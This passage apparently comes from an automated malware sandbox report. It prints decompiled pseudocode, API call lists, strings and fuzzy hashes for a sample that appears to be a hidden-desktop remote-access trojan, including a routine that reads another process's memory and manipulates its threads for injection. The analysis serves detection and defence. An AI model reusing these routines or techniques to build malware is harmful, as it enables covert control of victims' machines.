							if( *(_t65 + 0x18) != 0) {
								L32:
								LeaveCriticalSection();
								goto L55;
							}
							__eflags =  *((long long*)(_t65 + 0x38));
							 *(_t65 + 0x18) = r14d;
							if( *((long long*)(_t65 + 0x38)) != 0) {
								goto L32;
							} else {
								goto L28;
							}
							do {
								L28:
								_t119 =  *_t65;
								_t46 = E00C7C050(_t62, _t65, _t135, _t119, _t119);
								__eflags = _t46;
								if(_t46 == 0) {
									goto L31;
								}
								_t47 = E00C7B764(_t62, _t65, _t119);
								__eflags = _t47;
								if(_t47 == 0) {
									goto L31;
								}
								__eflags = E00C7BB64(_t62, _t65, _t135, _t119, _t127) & 0x00000094;
								if(__eflags == 0) {
									LeaveCriticalSection();
									_t110 = _t119;
									_t87 = _t116;
									goto L34;
								}
								L31:
								_t65 =  *((intOrPtr*)(_t65 + 0x40));
								__eflags = _t65;
							} while (_t65 != 0);
							goto L32;
						}
						goto L57;
					}
					__eflags = _t54 - 8;
					if(_t54 != 8) {
						goto L58;
					}
					_v88 = 0x3c;
					_t41 = GetWindowInfo(??, ??);
					EnterCriticalSection(??);
					_t98 =  *((intOrPtr*)(_t116 + 0x1d0));
					while(1) {
						__eflags = _t98;
						if(_t98 == 0) {
							break;
						}
						__eflags =  *_t98 - _t119;
						if( *_t98 == _t119) {
							break;
						}
						_t98 =  *((intOrPtr*)(_t98 + 0x38));
					}
					__eflags = _t98;
					if(_t98 == 0) {
						r14d = 0;
					} else {
						r8d = 0x10;
						_t41 = memcpy(??, ??, ??);
					}
					goto L48;
				}
				_t41 = E00C82544(_t41, _t116);
				goto L58;
			}

0x00c81e14
0x00c81e14
0x00c81e14
0x00c81e14
0x00c81e14
0x00c81e17
0x00c81e1b
0x00c81e1f
0x00c81e23
0x00c81e33
0x00c81e39
0x00c81e43
0x00c81e48
0x00c81e4b
0x00c81e54
0x00c82131
0x00c8214f
0x00c8214f
0x00c81e60
0x00c81e6b
0x00c81e7a
0x00c81e7c
0x00000000
0x00000000
0x00c81e82
0x00c81e85
0x00000000
0x00000000
0x00c81e8b
0x00c81e8b
0x00c81e98
0x00c81e9d
0x00c81ea1
0x00000000
0x00000000
0x00c81ea7
0x00c81ea7
0x00c81eaa
0x00c820da
0x00c820df
0x00c820e1
0x00c82110
0x00c82110
0x00c82110
0x00c8211a
0x00c82123
0x00c82128
0x00c8212b
0x00c8212b
0x00000000
0x00c8212b
0x00c820e9
0x00c820ee
0x00c820f0
0x00000000
0x00000000
0x00c820f2
0x00c820fb
0x00c82106
0x00c8210b
0x00c8210b
0x00c8210e
0x00000000
0x00000000
0x00000000
0x00c8210e
0x00c81eb0
0x00c81eb0
0x00c81eb6
0x00c820ae
0x00c820b3
0x00c820b5
0x00000000
0x00000000
0x00c820b7
0x00c820b7
0x00c820c1
0x00c820cd
0x00000000
0x00c820cd
0x00c81ebc
0x00c81ebc
0x00c81ebf
0x00c8207c
0x00c82086
0x00c8208c
0x00c82095
0x00c8209a
0x00c8209d
0x00c820a0
0x00000000
0x00c820a0
0x00c81ec5
0x00c81ec5
0x00c81ec8
0x00c81ff5
0x00c81ffb
0x00c81ffd
0x00000000
0x00000000
0x00c82003
0x00c82003
0x00c8200d
0x00c82013
0x00c82025
0x00c82025
0x00c82028
0x00000000
0x00000000
0x00c8201c
0x00c8201f
0x00000000
0x00000000
0x00c82021
0x00c82021
0x00c8202a
0x00c8202d
0x00000000
0x00000000
0x00c82033
0x00c82036
0x00c8203a
0x00c8203e
0x00c82040
0x00c82042
0x00c82042
0x00c82042
0x00c82042
0x00c82049
0x00c8204f
0x00c82051
0x00c82057
0x00c8205a
0x00000000
0x00000000
0x00c82060
0x00c82063
0x00c82066
0x00c82069
0x00c81fe8
0x00c81fe8
0x00000000
0x00c81fe8
0x00c8206f
0x00c82072
0x00c82072
0x00000000
0x00c82051
0x00c81ece
0x00c81ece
0x00c81ed1
0x00c81f42
0x00c81f48
0x00c81f4a
0x00000000
0x00000000
0x00c81f50
0x00c81f50
0x00c81f5a
0x00c81f60
0x00c81f72
0x00c81f72
0x00c81f75
0x00000000
0x00000000
0x00c81f69
0x00c81f6c
0x00000000
0x00000000
0x00c81f6e
0x00c81f6e
0x00c81f77
0x00c81f7a
0x00c81f84
0x00c81f88
0x00c81fcb
0x00c81fce
0x00000000
0x00c81fce
0x00c81f8a
0x00c81f8f
0x00c81f93
0x00000000
0x00000000
0x00000000
0x00000000
0x00c81f95
0x00c81f95
0x00c81f95
0x00c81f9e
0x00c81fa3
0x00c81fa5
0x00000000
0x00000000
0x00c81faa
0x00c81faf
0x00c81fb1
0x00000000
0x00000000
0x00c81fbe
0x00c81fc0
0x00c81fdc
0x00c81fe2
0x00c81fe5
0x00000000
0x00c81fe5
0x00c81fc2
0x00c81fc2
0x00c81fc6
0x00c81fc6
0x00000000
0x00c81f95
0x00000000
0x00c81f7c
0x00c81ed3
0x00c81ed6
0x00000000
0x00000000
0x00c81ee1
0x00c81eec
0x00c81efc
0x00c81f02
0x00c81f14
0x00c81f14
0x00c81f17
0x00000000
0x00000000
0x00c81f0b
0x00c81f0e
0x00000000
0x00000000
0x00c81f10
0x00c81f10
0x00c81f19
0x00c81f1c
0x00c81f37
0x00c81f1e
0x00c81f27
0x00c81f2d
0x00c81f2d
0x00000000
0x00c81f1c
0x00c81e70
0x00000000

APIs

Part of subcall function 00C7FA04: EnterCriticalSection.KERNEL32 ref: 00C7FA20
Part of subcall function 00C7FA04: LeaveCriticalSection.KERNEL32 ref: 00C7FA4A

WaitForSingleObject.KERNEL32 ref: 00C81E60
GetWindowInfo.USER32 ref: 00C81EEC
EnterCriticalSection.KERNEL32 ref: 00C81EFC
memcpy.NTDLL ref: 00C81F2D
LeaveCriticalSection.KERNEL32 ref: 00C820A0
EnterCriticalSection.KERNEL32 ref: 00C8211A
LeaveCriticalSection.KERNEL32 ref: 00C8212B

Part of subcall function 00C82544: UnhookWinEvent.USER32 ref: 00C8256C
Part of subcall function 00C82544: UnhookWinEvent.USER32 ref: 00C82586
Part of subcall function 00C82544: UnhookWinEvent.USER32 ref: 00C825A0

Strings

<, xrefs: 00C81EE1

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalSection$EnterEventLeaveUnhook$InfoObjectSingleWaitWindowmemcpy
String ID: <
API String ID: 4263224718-4251816714
Opcode ID: 41400bb98f58b1dcdafbadc621b341cb4aaf51fcb83b353ace0ea2e704bc10fe
Instruction ID: 54444a1b66d64f291831954ccacbf188e717796fd564dad7f9216bac42e104b2
Opcode Fuzzy Hash: 41400bb98f58b1dcdafbadc621b341cb4aaf51fcb83b353ace0ea2e704bc10fe
Instruction Fuzzy Hash: 8E71883130064186EE28BF229A5C77D63A9FB85FC8F589522DF1A07B14DF38CA469309

Uniqueness

Uniqueness Score: -1.00%

Function 00C7D99C, Relevance: 28.6, APIs: 19, Instructions: 112windowCOMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,?,?,?,?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7D9C1
DeleteObject.GDI32 ref: 00C7D9CE
DeleteDC.GDI32 ref: 00C7D9DB
SelectObject.GDI32(?,?,?,?,?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7D9EF
DeleteObject.GDI32 ref: 00C7D9FC
DeleteDC.GDI32 ref: 00C7DA09
GetDC.USER32 ref: 00C7DA11
CreateCompatibleDC.GDI32 ref: 00C7DA24
GetLastError.KERNEL32(?,?,?,?,?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DA36
CreateCompatibleDC.GDI32 ref: 00C7DA44
CreateCompatibleBitmap.GDI32 ref: 00C7DA66
SelectObject.GDI32(?,?,?,?,?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DA82
SelectObject.GDI32(?,?,?,?,?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DAC6
SelectObject.GDI32(?,?,?,?,?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DB10
DeleteObject.GDI32 ref: 00C7DB3C
SelectObject.GDI32 ref: 00C7DB5D
DeleteObject.GDI32 ref: 00C7DB77
DeleteDC.GDI32 ref: 00C7DB91
DeleteDC.GDI32 ref: 00C7DBAB

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Object$Delete$Select$CompatibleCreate$BitmapErrorLast
String ID:
API String ID: 3176934299-0
Opcode ID: c341e61b8e7e056b35c5c5032506e6b38c71a8c44772ccabcad98c9536ab2a08
Instruction ID: ba3aa6e11e3949a5d78696e98961dbaf0b205417598577e9279b0d7d1b7bf1c5
Opcode Fuzzy Hash: c341e61b8e7e056b35c5c5032506e6b38c71a8c44772ccabcad98c9536ab2a08
Instruction Fuzzy Hash: 9251FC26202B8085FB15DF21D8587A92372FBC5F89F488235CE5E5BB58DF3AC469C324

Uniqueness

Uniqueness Score: -1.00%

Function 00C784F4, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 111registrynetworklibraryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00C78547
htons.WS2_32 ref: 00C7855C
htonl.WS2_32 ref: 00C78569
htons.WS2_32 ref: 00C78576
wsprintfW.USER32 ref: 00C785A7
RegOpenKeyExW.ADVAPI32 ref: 00C785C7
GetModuleHandleW.KERNEL32 ref: 00C7860B
LoadLibraryW.KERNEL32 ref: 00C7861D
GetLastError.KERNEL32 ref: 00C7862B
HeapFree.KERNEL32 ref: 00C78654
RegCloseKey.ADVAPI32 ref: 00C78663
RegCloseKey.ADVAPI32 ref: 00C78672
SetLastError.KERNEL32 ref: 00C7867E

Strings

{%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 00C78581
InprocServer32, xrefs: 00C785EB
SOFTWARE\Classes\CLSID, xrefs: 00C78521

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseErrorLastOpenhtons$FreeHandleHeapLibraryLoadModulehtonlwsprintf
String ID: InprocServer32$SOFTWARE\Classes\CLSID${%08X-%04X-%04X-%04X-%08X%04X}
API String ID: 4070548535-1088679775
Opcode ID: f9fa73df80b7946d9cd8fb4b917886576aeb41908b378137ba13bf5f4cb356d4
Instruction ID: 9c63509f7046e96e0b9b8a0f2f147932bcccfbc318e50108a6214ca414b7d1f8
Opcode Fuzzy Hash: f9fa73df80b7946d9cd8fb4b917886576aeb41908b378137ba13bf5f4cb356d4
Instruction Fuzzy Hash: A7414936711B549AFB208FA6E498BA933A0F748B89F418225EE5E42B54EF38C54DC714

Uniqueness

Uniqueness Score: -1.00%

Function 00C7A974, Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 82memorystringCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7A98D
HeapAlloc.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7A9A8
GetEnvironmentVariableW.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7A9C3
GetLastError.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7A9D5
HeapFree.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7A9E9
GetLastError.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7AA06
lstrcmpW.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7AA21
GetEnvironmentVariableW.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7AA37
HeapAlloc.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7AA54
GetEnvironmentVariableW.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7AA6F
lstrcatW.KERNEL32 ref: 00C7AA8F
SetLastError.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7AA9C

Strings

\Local Settings\Application Data, xrefs: 00C7AA85
LOCALAPPDATA, xrefs: 00C7AA17
USERPROFILE, xrefs: 00C7AA2E, 00C7AA65

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnvironmentVariable$ErrorHeapLast$Alloc$Freelstrcatlstrcmp
String ID: LOCALAPPDATA$USERPROFILE$\Local Settings\Application Data
API String ID: 3280976171-1870292887
Opcode ID: 9704a3e0be07ad33fe00cd86d56ea028e889eae136dacebb2726248183cf03d1
Instruction ID: ecf145279de0541476b638f0d5573bd5bb0381d27f38bee94e2b8c588438f960
Opcode Fuzzy Hash: 9704a3e0be07ad33fe00cd86d56ea028e889eae136dacebb2726248183cf03d1
Instruction Fuzzy Hash: E1317525300B4282FB109B67A994B2D63A1BBC9F90F84C525DD1E93B24EF3CC949DB15

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E3D4, Relevance: 25.6, APIs: 17, Instructions: 108threadmemoryCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C7E3EE
GetThreadDesktop.USER32(?,?,?,00C6878C,?,?,?,?,00C6214C), ref: 00C7E406
SetThreadDesktop.USER32(?,?,?,00C6878C,?,?,?,?,00C6214C), ref: 00C7E414
HeapFree.KERNEL32(?,?,?,00C6878C,?,?,?,?,00C6214C), ref: 00C7E42F
SelectObject.GDI32(?,?,?,00C6878C,?,?,?,?,00C6214C), ref: 00C7E45F
DeleteObject.GDI32 ref: 00C7E478
SelectObject.GDI32(?,?,?,00C6878C,?,?,?,?,00C6214C), ref: 00C7E498
DeleteObject.GDI32 ref: 00C7E4B1
DeleteDC.GDI32 ref: 00C7E4CA
DeleteDC.GDI32 ref: 00C7E4E3
SelectObject.GDI32(?,?,?,00C6878C,?,?,?,?,00C6214C), ref: 00C7E503
DeleteObject.GDI32 ref: 00C7E51C
DeleteDC.GDI32 ref: 00C7E535
SelectObject.GDI32(?,?,?,00C6878C,?,?,?,?,00C6214C), ref: 00C7E565
DeleteObject.GDI32 ref: 00C7E57E
DeleteDC.GDI32 ref: 00C7E597
CloseDesktop.USER32(?,?,?,00C6878C,?,?,?,?,00C6214C), ref: 00C7E5AC

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DeleteObject$Select$DesktopThread$CloseCurrentFreeHeap
String ID:
API String ID: 3677096374-0
Opcode ID: b3c1a23881f0f173b9678d650c73c5912f45f3bc04093d0eae5cfb375425d4db
Instruction ID: 9c285092eb954ee950f5b2e54d4dec75efa77710dc4f0d5b44dc7d8d687c8f06
Opcode Fuzzy Hash: b3c1a23881f0f173b9678d650c73c5912f45f3bc04093d0eae5cfb375425d4db
Instruction Fuzzy Hash: 28510D7A202B8089FB54DF61E4547693376FB88F88F8C8675CE5A4B618CF35C5A5C324

Uniqueness

Uniqueness Score: -1.00%

Function 00C7AB88, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 103memorythreadCOMMON

Download Yara Rule

APIs

SetThreadDesktop.USER32 ref: 00C7ABB2
GlobalAlloc.KERNEL32 ref: 00C7ABC5
GlobalLock.KERNEL32 ref: 00C7ABE1
MultiByteToWideChar.KERNEL32 ref: 00C7AC2D
GlobalUnlock.KERNEL32 ref: 00C7AC9E
CreateDialogIndirectParamW.USER32 ref: 00C7ACB8
GlobalFree.KERNEL32 ref: 00C7ACC4
ShowWindow.USER32 ref: 00C7ACD0

Strings

Browser Starting Hidden (By: H21)..., xrefs: 00C7AC3D
2, xrefs: 00C7ABED
My Dialog, xrefs: 00C7ABF9

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Global$AllocByteCharCreateDesktopDialogFreeIndirectLockMultiParamShowThreadUnlockWideWindow
String ID: 2$Browser Starting Hidden (By: H21)...$My Dialog
API String ID: 750254547-4155922450
Opcode ID: 08d883a3c1c53071bf468b8e87ed4429bb287ea06d1dc78ce14e6d47d193044d
Instruction ID: c674a8e98051fd397d4e8ecf57221ebfe7b586b6fdd91fc903ecd51dc01d0504
Opcode Fuzzy Hash: 08d883a3c1c53071bf468b8e87ed4429bb287ea06d1dc78ce14e6d47d193044d
Instruction Fuzzy Hash: FF414732210A4186EB15CF22E854B9E77B0F788F98F95C225DE5A07B64DF3DC54ACB44

Uniqueness

Uniqueness Score: -1.00%

Function 00C82764, Relevance: 22.6, APIs: 15, Instructions: 91windowsynchronizationmemoryCOMMON

Download Yara Rule

APIs

SetThreadDesktop.USER32 ref: 00C8277D
CoInitialize.OLE32 ref: 00C827A0
SetWinEventHook.USER32 ref: 00C827CA
SetWinEventHook.USER32 ref: 00C827F3
SetWinEventHook.USER32 ref: 00C8281B
SetEvent.KERNEL32 ref: 00C8282F
WaitForSingleObject.KERNEL32 ref: 00C8283B
GetMessageA.USER32 ref: 00C82855
TranslateMessage.USER32 ref: 00C82864
DispatchMessageA.USER32 ref: 00C8286F
WaitForSingleObject.KERNEL32 ref: 00C8287B
CoUninitialize.OLE32 ref: 00C82895
EnterCriticalSection.KERNEL32 ref: 00C828A5
HeapFree.KERNEL32 ref: 00C828C7
LeaveCriticalSection.KERNEL32 ref: 00C828DC

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Event$HookMessage$CriticalObjectSectionSingleWait$DesktopDispatchEnterFreeHeapInitializeLeaveThreadTranslateUninitialize
String ID:
API String ID: 3930758508-0
Opcode ID: 88f409b536d2340212a010baedf8c8bb031ae199d6e67557849dfee2e2b5ced7
Instruction ID: e7a848ab03ddc37ba25504b2272bcd5212d5f0b4c089a9f13841becba90d3035
Opcode Fuzzy Hash: 88f409b536d2340212a010baedf8c8bb031ae199d6e67557849dfee2e2b5ced7
Instruction Fuzzy Hash: E9413E36610B4087FB519F21E858BAE7371F788F9AF948225DE4A07A58CF39C54DCB48

Uniqueness

Uniqueness Score: -1.00%

Function 00C614F8, Relevance: 19.7, APIs: 13, Instructions: 187
threadsleepinjectionCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00C614F8(intOrPtr __edx, void* __ebp, intOrPtr* __rcx, void* __rdx, void* __r8, void* __r9) {
				void* __rbx;
				void* __rsi;
				void* __rbp;
				long _t60;
				void* _t68;
				int _t69;
				long _t86;
				void* _t87;
				void* _t88;
				void* _t114;
				long long _t115;
				long long _t117;
				void* _t120;
				intOrPtr* _t131;
				void* _t148;
				intOrPtr _t149;
				void* _t151;
				intOrPtr* _t154;
				void* _t157;
				void* _t159;
				void* _t160;
				void* _t170;
				long long _t171;
				int _t173;
				intOrPtr _t174;
				intOrPtr _t175;
				int _t177;
				void* _t179;
				void* _t180;
				intOrPtr _t181;

				_t170 = __r9;
				_t88 = __ebp;
				 *((intOrPtr*)(_t159 + 0x18)) = r8d;
				 *((intOrPtr*)(_t159 + 0x10)) = __edx;
				_push(_t120);
				_t157 = _t159 - 0x458;
				_t160 = _t159 - 0x558;
				_t154 = __rcx;
				r8d = 0x4d0;
				memset(_t180, _t177, _t173);
				_t114 =  *__rcx;
				r12d = 0;
				_t181 =  *0xc95698; // 0x0
				 *((long long*)(_t160 + 0x40)) = _t114;
				 *((intOrPtr*)(_t157 + 0x4b8)) = 0xccccfeeb;
				E00C64E28( *((intOrPtr*)(__rcx + 0x10)), _t120, __rdx, _t171);
				_t174 =  *_t154;
				_t8 = _t171 + 0x10; // 0x10
				r14d = 0;
				 *((intOrPtr*)(_t157 - 0x50)) = 0x100003;
				r14d =  !=  ? _t8 : r14d;
				 *((intOrPtr*)(_t157 + 0x4a0)) = r14d;
				E00C61E70();
				_t151 = _t114;
				if(_t114 == 0) {
					L14:
					_t175 =  *((intOrPtr*)(_t160 + 0x40));
					_t115 = _t160 + 0x48;
					 *((long long*)(_t160 + 0x20)) = _t115;
					r9d = 4;
					if(ReadProcessMemory(??, ??, ??, ??, ??) == 0 ||  *((intOrPtr*)(_t160 + 0x48)) != _t151) {
						L27:
						_t86 = GetLastError();
						goto L28;
					} else {
						r9d = 4;
						if(E00C61DD8(_t120, _t175, _t120, _t157, _t157 + 0x4b8) == 0) {
							goto L27;
						}
						_t87 = 0x1770;
						while(1) {
							ResumeThread();
							Sleep(??);
							SuspendThread(??);
							_t87 = _t87 - 0x12c;
							if(GetThreadContext(??, ??) == 0) {
								goto L27;
							}
							if(_t87 <= 0 ||  *((intOrPtr*)(_t157 + 0x78)) == _t120) {
								if(r14d != 0) {
									E00C64FAC(_t115, _t120, _t181);
									_t171 = _t115;
									_t181 =  !=  ? _t115 : _t181;
								}
								_t131 = _t154;
								if( *((intOrPtr*)(_t157 + 0x4b0)) == 0) {
									r8d = r14d;
									_t60 = E00C64C04(0x12c, _t87, _t115, _t120, _t131, _t181, _t154, _t157);
								} else {
									_t60 = E00C619A8(r14d, _t87, _t88, _t120, _t131, _t170);
								}
								_t86 = _t60;
								SwitchToThread();
								r9d = 4;
								E00C61DD8(_t120, _t175, _t120, _t157, _t160 + 0x30);
								if(_t86 != 0xffffffff) {
									L28:
									if(( *(_t157 + 0x4a8) & 0x00000004) == 0) {
										ResumeThread();
									}
									if(_t171 != 0) {
										E00C61E84();
									}
									return _t86;
								} else {
									goto L27;
								}
							} else {
								continue;
							}
						}
						goto L27;
					}
				}
				E00C64854(_t120, _t174);
				_t179 = _t114;
				if(_t114 == 0) {
					L12:
					r14d =  *((intOrPtr*)(_t157 + 0x4a0));
					L13:
					E00C61E84();
					goto L14;
				}
				r9d = 0x1000;
				 *((long long*)(_t160 + 0x20)) = _t160 + 0x38;
				if(ReadProcessMemory(??, ??, ??, ??, ??) == 0) {
					goto L12;
				}
				_t117 = _t160 + 0x38;
				_t148 =  *((intOrPtr*)(_t151 + 0x3c)) + _t179;
				 *((long long*)(_t160 + 0x20)) = _t117;
				r9d = 0x1000;
				if(ReadProcessMemory(??, ??, ??, ??, ??) == 0) {
					goto L12;
				}
				_t120 = _t120 + _t179;
				_t18 = _t117 + 0x10; // 0xd0
				_t68 =  ==  ? _t18 : 0xc0;
				if( *((intOrPtr*)(_t117 + _t151)) == r12d ||  *((intOrPtr*)(_t117 + _t151 + 4)) == r12d) {
					goto L12;
				} else {
					_t23 = _t171 + 0x28; // 0x28
					r9d = _t23;
					_t149 = _t148 + _t179;
					 *((long long*)(_t160 + 0x20)) = _t160 + 0x38;
					_t69 = ReadProcessMemory(??, ??, ??, ??, ??);
					r14d =  *((intOrPtr*)(_t157 + 0x4a0));
					if(_t69 == 0) {
						goto L13;
					}
					if(r14d == 0) {
						_t149 =  *((intOrPtr*)(_t160 + 0x68));
					}
					if(_t149 != 0) {
						r9d = 0x1000;
						 *((long long*)(_t160 + 0x20)) = _t160 + 0x38;
						if(ReadProcessMemory(??, ??, ??, ??, ??) != 0) {
							_t120 =  !=  ?  *_t151 : _t120;
						}
					}
					goto L13;
				}
			}

0x00c614f8
0x00c614f8
0x00c614f8
0x00c614fd
0x00c61502
0x00c6150d
0x00c61515
0x00c6151c
0x00c61525
0x00c6152b
0x00c61530
0x00c61538
0x00c6153b
0x00c61542
0x00c61547
0x00c61551
0x00c61556
0x00c61559
0x00c6155e
0x00c61561
0x00c6156a
0x00c61573
0x00c6157c
0x00c61581
0x00c61587
0x00c61693
0x00c61693
0x00c61698
0x00c616a2
0x00c616a7
0x00c616bd
0x00c6178c
0x00c61792
0x00000000
0x00c616ce
0x00c616ce
0x00c616e5
0x00000000
0x00000000
0x00c616eb
0x00c616f0
0x00c616f4
0x00c616ff
0x00c61709
0x00c61717
0x00c61725
0x00000000
0x00000000
0x00c61729
0x00c61734
0x00c61739
0x00c61741
0x00c61744
0x00c61744
0x00c6174f
0x00c61752
0x00c6175e
0x00c61764
0x00c61754
0x00c61757
0x00c61757
0x00c61769
0x00c6176b
0x00c61771
0x00c61782
0x00c6178a
0x00c61794
0x00c6179b
0x00c617a1
0x00c617a1
0x00c617aa
0x00c617af
0x00c617af
0x00c617c9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00c61729
0x00000000
0x00c616f0
0x00c616bd
0x00c61590
0x00c61595
0x00c6159b
0x00c61684
0x00c61684
0x00c6168b
0x00c6168e
0x00000000
0x00c6168e
0x00c615a6
0x00c615af
0x00c615c2
0x00000000
0x00000000
0x00c615cc
0x00c615d1
0x00c615d4
0x00c615d9
0x00c615ed
0x00000000
0x00000000
0x00c615fb
0x00c61607
0x00c6160a
0x00c61611
0x00000000
0x00c6161a
0x00c6161d
0x00c6161d
0x00c61627
0x00c6162f
0x00c61637
0x00c6163d
0x00c61646
0x00000000
0x00000000
0x00c6164f
0x00c61651
0x00c61651
0x00c61659
0x00c61660
0x00c61669
0x00c61679
0x00c6167e
0x00c6167e
0x00c61679
0x00000000
0x00c61659

APIs

memset.NTDLL ref: 00C6152B

Part of subcall function 00C64E28: GetModuleHandleW.KERNEL32 ref: 00C64E4F
Part of subcall function 00C64E28: GetProcAddress.KERNEL32 ref: 00C64E5F
Part of subcall function 00C64E28: OpenProcess.KERNEL32 ref: 00C64E7F
Part of subcall function 00C64E28: CloseHandle.KERNEL32 ref: 00C64EAD

ReadProcessMemory.KERNEL32 ref: 00C615BA
ReadProcessMemory.KERNEL32 ref: 00C615E5
ReadProcessMemory.KERNEL32 ref: 00C61637
ReadProcessMemory.KERNEL32 ref: 00C61671
ReadProcessMemory.KERNEL32 ref: 00C616B5
ResumeThread.KERNEL32 ref: 00C616F4
Sleep.KERNEL32 ref: 00C616FF
SuspendThread.KERNEL32 ref: 00C61709
GetThreadContext.KERNEL32 ref: 00C6171D
SwitchToThread.KERNEL32 ref: 00C6176B
GetLastError.KERNEL32 ref: 00C6178C
ResumeThread.KERNEL32 ref: 00C617A1

Part of subcall function 00C64854: memset.NTDLL ref: 00C64871
Part of subcall function 00C64854: ZwQueryInformationProcess.NTDLL ref: 00C64893
Part of subcall function 00C64854: ReadProcessMemory.KERNEL32 ref: 00C648BD

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process$MemoryRead$Thread$HandleResumememset$AddressCloseContextErrorInformationLastModuleOpenProcQuerySleepSuspendSwitch
String ID:
API String ID: 3455230186-0
Opcode ID: 59c4661fb3599875c7b3a62a560c74dc8eb81e5b060ec4f3e54e498cab2f0259
Instruction ID: 9c4765ba436aea54bb844f01328454a7656d2c78d391b036af0116d856e6a529
Opcode Fuzzy Hash: 59c4661fb3599875c7b3a62a560c74dc8eb81e5b060ec4f3e54e498cab2f0259
Instruction Fuzzy Hash: 2A71C076301B8186EB34DF22E8907AA7764FB84BCAF4C8125EE5A57B54DF38C549C700

Uniqueness

Uniqueness Score: -1.00%

